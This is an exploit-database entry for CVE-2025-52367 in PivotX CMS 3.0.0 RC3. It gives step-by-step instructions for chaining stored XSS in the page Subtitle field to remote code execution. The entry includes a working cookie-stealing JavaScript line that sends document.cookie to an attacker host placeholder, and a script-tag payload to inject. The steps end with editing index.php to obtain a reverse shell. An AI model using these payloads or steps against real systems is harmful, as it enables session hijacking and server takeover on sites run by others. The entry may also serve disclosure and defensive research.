
12 changes to exploits/shellcodes/ghdb TOTOLINK N300RB 8.54 - Command Execution MikroTik RouterOS 7.19.1 - Reflected XSS Langflow 1.2.x - Remote Code Execution (RCE) PivotX 3.0.0 RC3 - Remote Code Execution (RCE) SugarCRM 14.0.0 - SSRF/Code Injection White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI) WP Publications WordPress Plugin 1.2 - Stored XSS NodeJS 24.x - Path Traversal Keras 2.15 - Remote Code Execution (RCE) Microsoft Brokering File System Windows 11 Version 22H2 - Elevation of Privilege Microsoft Graphics Component Windows 11 Pro (Build 26100+) - Local Elevation of Privileges Microsoft Outlook - Remote Code Execution (RCE)
45 lines
No EOL
2 KiB
Text
45 lines
No EOL
2 KiB
Text
# Exploit Title: PivotX v3.0.0 RC3 - Stored XSS to Remote Code Execution (RCE)
|
||
# Date: July 2025
|
||
# Exploit Author: HayToN
|
||
# Vendor Homepage: https://github.com/pivotx
|
||
# Software Link: https://github.com/pivotx/PivotX
|
||
# Version: 3.0.0 RC3
|
||
# Tested on: Debian 11, PHP 7.4
|
||
# CVE : CVE-2025-52367
|
||
|
||
## Vulnerability Type:
|
||
Stored Cross-Site Scripting (XSS) in the "title" and "subtitle" fields of page creation. The input is not sanitized and is stored directly to disk via PHP serialize().
|
||
|
||
## Root Cause:
|
||
In 'modules/pages_flat.php', function 'savePage($page)' stores page data via 'saveSerialize()' without any sanitization. The stored values are later rendered in the admin panel without escaping.
|
||
|
||
Only the 'body' and 'introduction' fields are passed through TinyMCE (which encodes HTML). 'title' and 'subtitle' are rendered as raw HTML.
|
||
|
||
Note: If you are already admin, skip steps 1-7
|
||
## Exploitation Steps:
|
||
1. Login as an authenticated user (normal user, no need for admin).
|
||
|
||
2. Create a new Page via the dashboard, located at http://IP/PivotX/pivotx/index.php?page=page
|
||
|
||
3. Create locally a JavaScript file contaning cookie stealing code.
|
||
For example: lol.js
|
||
Containing:
|
||
document.location = 'http://LOCAL_IP/bruh?c=' + document.cookie;
|
||
|
||
4. In the "Subtitle" field, input the following payload(Be sure to change the file name as yours):
|
||
|
||
<script src="http://LOCAL_IP/lol.js"></script>
|
||
|
||
5. Publish the page.
|
||
|
||
6. When an admin views the published page in the blog, the XSS will execute in the admin’s context.
|
||
|
||
7. Using this XSS, send a payload to steal the admin's cookies, then insert the cookies on your site.
|
||
|
||
8. Navigate as admin, to http://IP/PivotX/pivotx/index.php?page=homeexplore, where you can edit index.php file
|
||
|
||
9. Edit index.php file to any php file you want to gain RCE on the target, could be with reverse shell or any other method.
|
||
|
||
10. Visit http://IP/PivotX/index.php and you should get a reverse shell :)
|
||
|
||
# Full research - https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3 |